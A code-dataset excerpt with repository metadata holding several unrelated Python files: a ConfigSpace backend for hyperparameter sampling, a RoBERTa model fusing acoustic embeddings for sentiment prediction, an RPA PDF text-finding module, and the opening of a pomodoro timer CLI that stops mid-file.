375e6389f147aa8b980167ffea1afe5678abb33e | 4,203 | py | Python | sspace/backends/cspace.py | Epistimio/sample-space | 5435b7f97a5c9dea279271033fd4582dbd77211f | [
"BSD-3-Clause"
] | null | null | null | sspace/backends/cspace.py | Epistimio/sample-space | 5435b7f97a5c9dea279271033fd4582dbd77211f | [
"BSD-3-Clause"
] | 6 | 2020-05-23T02:16:40.000Z | 2022-03-16T01:37:45.000Z | sspace/backends/cspace.py | Epistimio/sample-space | 5435b7f97a5c9dea279271033fd4582dbd77211f | [
"BSD-3-Clause"
] | null | null | null | import_error = None
try:
import ConfigSpace as cs
import ConfigSpace.hyperparameters as csh
from sspace.utils import sort_dict
cond_dispatch_leaves = {
'eq': cs.EqualsCondition,
'ne': cs.NotEqualsCondition,
'lt': cs.LessThanCondition,
'gt': cs.GreaterThanCondition,
'in': cs.InCondition
}
forbid_dispatch_leaves = {
'eq': cs.ForbiddenEqualsClause,
'in': cs.ForbiddenInClause,
}
cond_dispatch_nodes = {
'and': cs.AndConjunction,
'or': cs.OrConjunction,
}
forbid_dispatch_nodes = {
'and': cs.ForbiddenAndConjunction
}
def categorical(name, options):
return csh.CategoricalHyperparameter(
name,
choices=list(options.keys()),
weights=list(options.values()))
def uniform(quantization, discrete=False, **kwargs):
if discrete:
return csh.UniformIntegerHyperparameter(q=quantization, **kwargs)
return csh.UniformFloatHyperparameter(q=quantization, **kwargs)
def normal(quantization, loc, scale, discrete=False, **kwargs):
if discrete:
return csh.NormalIntegerHyperparameter(mu=loc, sigma=scale, q=quantization, **kwargs)
return csh.NormalFloatHyperparameter(mu=loc, sigma=scale, q=quantization, **kwargs)
dim_leaves = {
'uniform': uniform,
'normal': normal,
'categorical': categorical,
'ordinal': csh.OrdinalHyperparameter
}
except ImportError as e:
import_error = e
class _ConfigSpaceBuilder:
def __init__(self):
if import_error:
raise import_error
def cond_leaf(self, mode, leaf, hyper_parameter, ctx=None):
fun = None
if mode == 'conditionals':
fun = cond_dispatch_leaves.get(leaf.name)
elif mode == 'forbid':
fun = forbid_dispatch_leaves.get(leaf.name)
if fun is None:
raise NotImplementedError(f'{leaf.name} is missing')
if mode == 'conditionals':
name = leaf.expression
if not isinstance(name, str):
name = name.name
expr = ctx.get(name)
return fun(hyper_parameter, expr, leaf.value)
return fun(hyper_parameter, leaf.value)
def cond_node(self, mode, node, hyper_parameter, ctx=None):
fun = None
if mode == 'conditionals':
fun = cond_dispatch_nodes.get(node.name)
elif mode == 'forbid':
fun = forbid_dispatch_nodes.get(node.name)
if fun is None:
raise NotImplementedError(f'{node.name} is missing')
lhs = node.lhs.visit(self, mode, hyper_parameter, ctx)
rhs = node.rhs.visit(self, mode, hyper_parameter, ctx)
return fun(lhs, rhs)
def dim_leaf(self, fun_name, **kwargs):
fun = dim_leaves.get(fun_name)
if fun is None:
raise NotImplementedError(f'{fun_name} is missing')
return fun(**kwargs)
def dim_node(self, node, **kwargs):
space = cs.ConfigurationSpace()
ctx = {}
for k, hp_expr in node.space_tree.items():
new_hp = hp_expr.visit(self, **kwargs)
if isinstance(new_hp, cs.ConfigurationSpace):
space.add_configuration_space(
prefix=hp_expr.name,
delimiter='.',
configuration_space=new_hp)
else:
space.add_hyperparameter(new_hp)
ctx[k] = new_hp
if hp_expr.condition is not None:
cond = hp_expr.condition.visit(self, 'conditionals', new_hp, ctx)
space.add_condition(cond)
if hp_expr.forbidden is not None:
forbid = hp_expr.forbidden.visit(self, 'forbid', new_hp)
space.add_forbidden_clause(forbid)
return space
@staticmethod
def sample(handle, n_samples, seed):
handle.seed(seed)
samples = handle.sample_configuration(n_samples)
if isinstance(samples, list):
return [sort_dict(c.get_dictionary()) for c in samples]
return [sort_dict(samples.get_dictionary())]
| 28.787671 | 97 | 0.600999 | 457 | 4,203 | 5.374179 | 0.266958 | 0.017101 | 0.030945 | 0.013436 | 0.245521 | 0.210098 | 0.185668 | 0.098534 | 0.049674 | 0.049674 | 0 | 0 | 0.29931 | 4,203 | 145 | 98 | 28.986207 | 0.833956 | 0 | 0 | 0.113208 | 0 | 0 | 0.044016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084906 | false | 0 | 0.075472 | 0.009434 | 0.283019 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3761ad381b725114e1ca90dc5552b488a21daeb4 | 16,128 | py | Python | models/roberta.py | tjdevWorks/multimodal-sentiment-prediction | cc656817f12e9676f59dd66c134a365bad8cbcec | [
"Apache-2.0"
] | 8 | 2022-02-04T20:37:26.000Z | 2022-03-30T03:18:04.000Z | models/roberta.py | tjdevWorks/multimodal-sentiment-prediction | cc656817f12e9676f59dd66c134a365bad8cbcec | [
"Apache-2.0"
] | 1 | 2022-02-13T22:44:30.000Z | 2022-02-13T23:15:34.000Z | models/roberta.py | tjdevWorks/TEASEL | cc656817f12e9676f59dd66c134a365bad8cbcec | [
"Apache-2.0"
] | null | null | null | from transformers import RobertaPreTrainedModel
from transformers.models.roberta.modeling_roberta import RobertaEmbeddings, RobertaEncoder, RobertaPooler, RobertaLMHead, RobertaClassificationHead
from transformers.modeling_outputs import BaseModelOutputWithPoolingAndCrossAttentions, MaskedLMOutput, SequenceClassifierOutput
from transformers.utils import logging
import torch
logger = logging.get_logger()
class RobertaTEASEL(RobertaPreTrainedModel):
"""
The model can behave as an encoder (with only self-attention) as well as a decoder, in which case a layer of
cross-attention is added between the self-attention layers, following the architecture described in `Attention is
all you need`_ by Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz
Kaiser and Illia Polosukhin.
To behave as an decoder the model needs to be initialized with the :obj:`is_decoder` argument of the configuration
set to :obj:`True`. To be used in a Seq2Seq model, the model needs to initialized with both :obj:`is_decoder`
argument and :obj:`add_cross_attention` set to :obj:`True`; an :obj:`encoder_hidden_states` is then expected as an
input to the forward pass.
.. _`Attention is all you need`: https://arxiv.org/abs/1706.03762
"""
_keys_to_ignore_on_load_missing = [r"position_ids"]
# Copied from transformers.models.bert.modeling_bert.BertModel.__init__ with Bert->Roberta
def __init__(self, config, add_pooling_layer=True):
super().__init__(config)
self.config = config
self.embeddings = RobertaEmbeddings(config)
self.encoder = RobertaEncoder(config)
self.pooler = RobertaPooler(config) if add_pooling_layer else None
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
# Copied from transformers.models.bert.modeling_bert.BertModel.forward
def forward(
self,
acoustic_embedding,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
the cross-attention if the model is configured as a decoder. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))` of length :obj:`config.n_layers` with each tuple having 4 tensors of shape :obj:`(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last :obj:`decoder_input_ids`
(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
instead of all :obj:`decoder_input_ids` of shape :obj:`(batch_size, sequence_length)`.
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if self.config.is_decoder:
use_cache = use_cache if use_cache is not None else self.config.use_cache
else:
use_cache = False
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
batch_size, seq_length = input_shape
device = input_ids.device if input_ids is not None else inputs_embeds.device
# past_key_values_length
past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
if attention_mask is None:
attention_mask = torch.ones(((batch_size, seq_length + past_key_values_length)), device=device)
if token_type_ids is None:
if hasattr(self.embeddings, "token_type_ids"):
buffered_token_type_ids = self.embeddings.token_type_ids[:, :seq_length]
buffered_token_type_ids_expanded = buffered_token_type_ids.expand(batch_size, seq_length)
token_type_ids = buffered_token_type_ids_expanded
else:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
# We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
# ourselves in which case we just need to make it broadcastable to all heads.
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape, device)
# If a 2D or 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.is_decoder and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_extended_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output = self.embeddings(
input_ids=input_ids,
position_ids=position_ids,
token_type_ids=token_type_ids,
inputs_embeds=inputs_embeds,
past_key_values_length=past_key_values_length,
)
# Create the fusion of acoustic and text embedding out
fusion_embedding = torch.concat((torch.unsqueeze(embedding_output[:,0,:],1), acoustic_embedding, embedding_output[:,1:,:]),1)
encoder_outputs = self.encoder(
fusion_embedding,
attention_mask=extended_attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_extended_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
if not return_dict:
return (sequence_output, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPoolingAndCrossAttentions(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
past_key_values=encoder_outputs.past_key_values,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
cross_attentions=encoder_outputs.cross_attentions,
)
class RobertaForMaskedLM_Teasel(RobertaPreTrainedModel):
_keys_to_ignore_on_save = [r"lm_head.decoder.weight", r"lm_head.decoder.bias"]
_keys_to_ignore_on_load_missing = [r"position_ids", r"lm_head.decoder.weight", r"lm_head.decoder.bias"]
_keys_to_ignore_on_load_unexpected = [r"pooler"]
def __init__(self, config):
super().__init__(config)
if config.is_decoder:
logger.warning(
"If you want to use `RobertaForMaskedLM` make sure `config.is_decoder=False` for "
"bi-directional self-attention."
)
self.roberta = RobertaTEASEL(config, add_pooling_layer=False)
self.lm_head = RobertaLMHead(config)
# The LM head weights require special treatment only when they are tied with the word embeddings
self.update_keys_to_ignore(config, ["lm_head.decoder.weight"])
self.init_weights()
def get_output_embeddings(self):
return self.lm_head.decoder
def set_output_embeddings(self, new_embeddings):
self.lm_head.decoder = new_embeddings
def forward(
self,
acoustic_embedding,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ...,
config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored
(masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``
kwargs (:obj:`Dict[str, any]`, optional, defaults to `{}`):
Used to hide legacy arguments that have been deprecated.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.roberta(
acoustic_embedding,
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
prediction_scores = self.lm_head(sequence_output)
masked_lm_loss = None
if labels is not None:
loss_fct = torch.nn.CrossEntropyLoss()
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (prediction_scores,) + outputs[2:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return MaskedLMOutput(
loss=masked_lm_loss,
logits=prediction_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
class RobertaForSequenceClassification(RobertaPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"position_ids"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.config = config
self.roberta = RobertaTEASEL(config, add_pooling_layer=False)
self.classifier = RobertaClassificationHead(config)
self.init_weights()
def forward(
self,
acoustic_embedding,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.roberta(
acoustic_embedding,
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = torch.nn.MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = torch.nn.CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = torch.nn.BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
| 44.8 | 213 | 0.667783 | 2,018 | 16,128 | 5.061447 | 0.153617 | 0.036421 | 0.021147 | 0.014 | 0.418837 | 0.334737 | 0.31868 | 0.255042 | 0.217838 | 0.198159 | 0 | 0.004591 | 0.257254 | 16,128 | 359 | 214 | 44.924791 | 0.848067 | 0.264447 | 0 | 0.471545 | 0 | 0 | 0.045072 | 0.017108 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044715 | false | 0 | 0.020325 | 0.00813 | 0.130081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3762cff1ab3661bebf0065d7a9d2efca756c6d5d | 14,847 | py | Python | packages/pdf/src/RPA/PDF/keywords/finder.py | AntonStange/rpaframework | 2a6a4abe56c7fece4f9cfed1ba488774393abdd8 | [
"Apache-2.0"
] | 25 | 2020-03-30T09:01:11.000Z | 2020-05-21T04:04:58.000Z | packages/pdf/src/RPA/PDF/keywords/finder.py | AntonStange/rpaframework | 2a6a4abe56c7fece4f9cfed1ba488774393abdd8 | [
"Apache-2.0"
] | 2 | 2020-04-02T18:08:58.000Z | 2020-05-27T12:07:19.000Z | packages/pdf/src/RPA/PDF/keywords/finder.py | AntonStange/rpaframework | 2a6a4abe56c7fece4f9cfed1ba488774393abdd8 | [
"Apache-2.0"
] | 7 | 2020-04-02T17:17:26.000Z | 2020-05-27T04:18:54.000Z | import functools
import math
import re
from dataclasses import dataclass
try:
# Python >=3.7
from re import Pattern
except ImportError:
# Python =3.6
from re import _pattern_type as Pattern
from typing import (
Callable,
Dict,
List,
Optional,
Union,
)
from RPA.PDF.keywords import (
LibraryContext,
keyword,
)
from RPA.PDF.keywords.model import BaseElement, TextBox
class TargetObject(BaseElement):
"""Container for Target text boxes with coordinates."""
# Class level constants.
boxid: int = -1
text: str = ""
Element = Union[TextBox, TargetObject]
@dataclass
class Match:
"""Match object returned by the `Find Text` keyword.
It contains the anchor point and its relative found elements in text format.
"""
anchor: str
direction: str
neighbours: List[str]
class FinderKeywords(LibraryContext):
"""Keywords for locating elements."""
def __init__(self, ctx):
super().__init__(ctx)
# Text locator might lead to multiple valid found anchors.
self._anchors: List[Element] = []
# The others usually have just one. (if multiple are found, set to it the
# first one)
self.anchor_element = None
def _get_candidate_search_function(
self, direction: str, regexp: Optional[Pattern], strict: bool
) -> Callable[[TextBox], bool]:
if direction in ["left", "right"]:
return functools.partial(
self._is_match_on_horizontal,
direction=direction,
regexp=regexp,
strict=strict,
)
if direction in ["top", "bottom", "up", "down"]:
return functools.partial(
self._is_match_on_vertical,
direction=direction,
regexp=regexp,
strict=strict,
)
if direction == "box":
return self._is_match_in_box
raise ValueError(f"Not recognized direction search {direction!r}")
def _log_element(self, elem: Element, prefix: str = ""):
template = f"{prefix} box %d | bbox %s | text %r"
self.logger.debug(template, elem.boxid, elem.bbox, elem.text)
@keyword
def find_text(
self,
locator: str,
pagenum: Union[int, str] = 1,
direction: str = "right",
closest_neighbours: Optional[Union[int, str]] = 1,
strict: bool = False,
regexp: str = None,
trim: bool = True,
) -> List[Match]:
"""Find the closest text elements near the set anchor(s) through `locator`.
The PDF will be parsed automatically before elements can be searched.
:param locator: Element to set anchor to. This can be prefixed with either
`text:`, `regex:` or `coords:` to find the anchor by text or coordinates.
`text` is assumed if no such prefix is specified. (text search is case
insensitive)
:param pagenum: Page number where search is performed on, defaults to 1 (first
page).
:param direction: In which direction to search for text elements. This can be
any of 'top'/'up', 'bottom'/'down', 'left' or 'right'. (defaults to
'right')
:param closest_neighbours: How many neighbours to return at most, sorted by the
distance from the current anchor.
:param strict: If element's margins should be used for matching those which are
aligned to the anchor. (turned off by default)
:param regexp: Expected format of the searched text value. By default all the
candidates in range are considered valid neighbours.
:param trim: Automatically trim leading/trailing whitespace from the text
elements. (switched on by default)
:returns: A list of `Match` objects where every match has the following
attributes: `.anchor` - the matched text with the locator; `.neighbours` -
a list of adjacent texts found on the specified direction
**Examples**
**Robot Framework**
.. code-block:: robotframework
PDF Invoice Parsing
Open Pdf invoice.pdf
${matches} = Find Text Invoice Number
Log List ${matches}
.. code-block::
List has one item:
Match(anchor='Invoice Number', direction='right', neighbours=['INV-3337'])
**Python**
.. code-block:: python
from RPA.PDF import PDF
pdf = PDF()
def pdf_invoice_parsing():
pdf.open_pdf("invoice.pdf")
matches = pdf.find_text("Invoice Number")
for match in matches:
print(match)
pdf_invoice_parsing()
.. code-block::
Match(anchor='Invoice Number', direction='right', neighbours=['INV-3337'])
"""
pagenum = int(pagenum)
if closest_neighbours is not None:
closest_neighbours = int(closest_neighbours)
self.logger.info(
"Searching for %s neighbour(s) to the %s of %r on page %d using regular "
"expression: %s",
f"closest {closest_neighbours}"
if closest_neighbours is not None
else "all",
direction,
locator,
pagenum,
regexp,
)
self.set_anchor_to_element(locator, trim=trim, pagenum=pagenum)
if not self.anchor_element:
self.logger.warning("No anchor(s) set for locator: %s", locator)
return []
regexp_compiled = re.compile(regexp) if regexp else None
search_for_candidate = self._get_candidate_search_function(
direction, regexp_compiled, strict
)
candidates_dict: Dict[int, List[Element]] = {}
anchors_map: Dict[int, Element] = {}
for anchor in self._anchors:
candidates_dict[anchor.boxid] = []
anchors_map[anchor.boxid] = anchor
for candidate in self._get_textboxes_on_page(pagenum):
self._log_element(candidate, prefix="Current candidate:")
for anchor in self._anchors:
self._log_element(anchor, prefix="Current anchor:")
# Skip anchor element itself from matching and check if the candidate
# matches the search criteria.
if candidate.boxid != anchor.boxid and search_for_candidate(
candidate, anchor=anchor
):
candidates_dict[anchor.boxid].append(candidate)
matches = []
for anchor_id, candidates in candidates_dict.items():
anchor = anchors_map[anchor_id]
self._sort_candidates_by_anchor(candidates, anchor=anchor)
if closest_neighbours is not None:
# Keep the first N closest neighbours from the entire set of candidates.
candidates[closest_neighbours:] = []
match = Match(
anchor=anchor.text,
direction=direction,
neighbours=[candidate.text for candidate in candidates],
)
matches.append(match)
return matches
@keyword
def set_anchor_to_element(
self, locator: str, trim: bool = True, pagenum: Union[int, str] = 1
) -> bool:
"""Sets main anchor point in the document for further searches.
This is used internally in the library and can work with multiple anchors at
the same time if such are found.
:param locator: Element to set anchor to. This can be prefixed with either
`text:`, `regex:` or `coords:` to find the anchor by text or coordinates.
`text` is assumed if no such prefix is specified. (text search is case
insensitive)
:param trim: Automatically trim leading/trailing whitespace from the text
elements. (switched on by default)
:param pagenum: Page number where search is performed on, defaults to 1 (first
page).
:returns: True if at least one anchor was found.
**Examples**
**Robot Framework**
.. code-block:: robotframework
Example Keyword
${success} = Set Anchor To Element Invoice Number
**Python**
.. code-block:: python
from RPA.PDF import PDF
pdf = PDF()
def example_keyword():
success = pdf.set_anchor_to_element("Invoice Number")
"""
pagenum = int(pagenum)
self.logger.info(
"Trying to set anchor on page %d using locator: %r", pagenum, locator
)
self.ctx.convert(trim=trim, pagenum=pagenum)
self._anchors.clear()
self.anchor_element = None
pure_locator = locator
criteria = "text"
parts = locator.split(":", 1)
if len(parts) == 2 and parts[0] in ("coords", "text", "regex"):
criteria = parts[0]
pure_locator = parts[1]
if criteria == "coords":
coords = pure_locator.split(",")
if len(coords) == 2:
left, bottom = coords
top = bottom
right = left
elif len(coords) == 4:
left, bottom, right, top = coords
else:
raise ValueError("Give 2 coordinates for point, or 4 for area")
bbox = (
int(left),
int(bottom),
int(right),
int(top),
)
anchor = TargetObject(bbox=bbox)
self._anchors.append(anchor)
else:
if criteria == "regex":
pure_locator = re.compile(pure_locator)
anchors = self._find_matching_textboxes(pure_locator, pagenum=pagenum)
self._anchors.extend(anchors)
if self._anchors:
self.anchor_element = self._anchors[0]
return True
return False
def _get_textboxes_on_page(self, pagenum: int) -> List[TextBox]:
page = self.active_pdf_document.get_page(pagenum)
return list(page.textboxes.values())
def _find_matching_textboxes(
self, locator: Union[str, Pattern], *, pagenum: int
) -> List[TextBox]:
self.logger.info("Searching for matching text boxes with: %r", locator)
if isinstance(locator, str):
lower_locator = locator.lower()
matches_anchor = (
lambda _anchor: _anchor.text.lower() == lower_locator
) # noqa: E731
else:
matches_anchor = lambda _anchor: locator.match(_anchor.text) # noqa: E731
anchors = []
for anchor in self._get_textboxes_on_page(pagenum):
if matches_anchor(anchor):
anchors.append(anchor)
if anchors:
self.logger.info("Found %d matches with locator %r", len(anchors), locator)
for anchor in anchors:
self._log_element(anchor)
else:
self.logger.warning("Did not find any matches with locator %r", locator)
return anchors
def _check_text_match(self, candidate: TextBox, regexp: Optional[Pattern]) -> bool:
if regexp and regexp.match(candidate.text):
self._log_element(candidate, prefix="Exact match:")
return True
if regexp is None:
self._log_element(candidate, prefix="Potential match:")
return True
return False
def _is_match_on_horizontal(
self,
candidate: TextBox,
*,
direction: str,
regexp: Optional[Pattern],
strict: bool,
anchor: TextBox,
) -> bool:
(left, bottom, right, top) = anchor.bbox
direction_left = direction == "left"
direction_right = direction == "right"
if not any(
[
direction_left and candidate.right <= left,
direction_right and candidate.left >= right,
]
):
return False # not in the seeked direction
non_strict_match = not strict and (
bottom <= candidate.bottom <= top
or bottom <= candidate.top <= top
or candidate.bottom <= bottom <= candidate.top
or candidate.bottom <= top <= candidate.top
)
strict_match = strict and (candidate.bottom == bottom or candidate.top == top)
if not any([non_strict_match, strict_match]):
return False # candidate not in boundaries
return self._check_text_match(candidate, regexp)
def _is_match_on_vertical(
self,
candidate: TextBox,
*,
direction: str,
regexp: Optional[Pattern],
strict: bool,
anchor: TextBox,
) -> bool:
(left, bottom, right, top) = anchor.bbox
direction_down = direction in ["bottom", "down"]
direction_up = direction in ["top", "up"]
if not any(
[
direction_down and candidate.top <= bottom,
direction_up and candidate.bottom >= top,
]
):
return False # not in the seeked direction
non_strict_match = not strict and (
left <= candidate.left <= right
or left <= candidate.right <= right
or candidate.left <= left <= candidate.right
or candidate.left <= right <= candidate.right
)
strict_match = strict and (candidate.left == left or candidate.right == right)
if not any([non_strict_match, strict_match]):
return False # candidate not in boundaries
return self._check_text_match(candidate, regexp)
def _is_match_in_box(self, candidate: TextBox, *, anchor: TextBox) -> bool:
(left, bottom, right, top) = anchor.bbox
return (
left <= candidate.left
and right >= candidate.right
and bottom <= candidate.bottom
and top >= candidate.top
)
@staticmethod
def _sort_candidates_by_anchor(
candidates: List[TextBox], *, anchor: TextBox
) -> None:
get_center = lambda item: ( # noqa: E731
(item.left + item.right) / 2,
(item.bottom + item.top) / 2,
)
anchor_center = get_center(anchor)
def get_distance(candidate):
candidate_center = get_center(candidate)
anchor_to_candidate_distance = math.sqrt(
math.pow((candidate_center[0] - anchor_center[0]), 2)
+ math.pow((candidate_center[1] - anchor_center[1]), 2)
)
return anchor_to_candidate_distance
candidates.sort(key=get_distance)
| 34.052752 | 88 | 0.579309 | 1,648 | 14,847 | 5.099515 | 0.169296 | 0.020228 | 0.007853 | 0.008567 | 0.297953 | 0.240124 | 0.212042 | 0.191218 | 0.178605 | 0.160162 | 0 | 0.004541 | 0.332525 | 14,847 | 435 | 89 | 34.131034 | 0.843491 | 0.253587 | 0 | 0.23913 | 0 | 0.003623 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047101 | false | 0 | 0.036232 | 0 | 0.184783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37637a324f01571ae1690b30b0221a8ae45d7ede | 2,662 | py | Python | ctimer/cli.py | zztin/ctimer | a0721bb9791b23305ee4ff4a2eb30a1f4d8c80cc | [
"Apache-2.0"
] | null | null | null | ctimer/cli.py | zztin/ctimer | a0721bb9791b23305ee4ff4a2eb30a1f4d8c80cc | [
"Apache-2.0"
] | 35 | 2020-06-07T12:40:43.000Z | 2021-06-03T19:56:01.000Z | ctimer/cli.py | zztin/ctimer | a0721bb9791b23305ee4ff4a2eb30a1f4d8c80cc | [
"Apache-2.0"
] | 1 | 2020-06-04T05:31:03.000Z | 2020-06-04T05:31:03.000Z | """Console script for ctimer."""
from ctimer import ctimer
import ctimer.ctimer_db as db
import sys
import argparse
from ctimer.visual import show_stats as ss
import logging
from ctimer import utils
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--debug",
help="Shorten clock intervals for debugging purposes.",
action="store_true",
)
parser.add_argument(
"--stats",
help="Show weekly stats of clock counts this week.",
action="store_true",
)
parser.add_argument(
"--overall", help="Show all clock counts across the years.", action="store_true"
)
parser.add_argument(
"--hide",
help="Display the timer always on top of other windows unless this statement is given",
action="store_true",
)
parser.add_argument(
"--silence",
help="Silence Mode (visual hint instead of audio hint.",
action="store_true",
)
parser.add_argument(
"--db",
type=utils.dir_path,
help="The relative or absolute folder path to store and/or read db. When leave empty: look for previous location, otherwise create new at HOME/.ctimer",
default=None,
)
parser.add_argument("--version", action="version", version="%(prog)s 1.0.0")
parser.add_argument(
"--cus",
action="store_true",
